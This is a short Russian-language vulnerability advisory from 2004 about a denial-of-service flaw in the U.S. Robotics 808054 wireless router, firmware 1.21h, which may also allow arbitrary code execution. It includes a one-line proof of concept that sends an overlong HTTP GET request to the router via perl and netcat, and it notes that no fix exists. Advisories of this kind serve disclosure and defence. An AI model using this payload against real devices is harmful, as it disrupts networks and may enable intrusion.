Security Lab

Отказ в обслуживании в U.S. Robotics wireless router

Дата публикации:03.08.2004
Всего просмотров:1147
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: U.S. Robotics wireless router (model 808054) Firmware 1.21h

Описание: Отказ в обслуживании в U.S. Robotics wireless router позволяет удаленному пользователю аварийно завершить работу маршрутизатора и может быть выполнить произвольный код на маршрутизаторе.

Пример:

bash ~ $ perl -e '$a = "GET / " . "A"x250 . "\r\n\r\n" ; print $a' | nc ap 80

URL производителя: http://www.usr.com/products/networking/router-product.asp?sku=USR8054

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: 7a69Adv#13 - USRobotics AP Wireless Denial of Service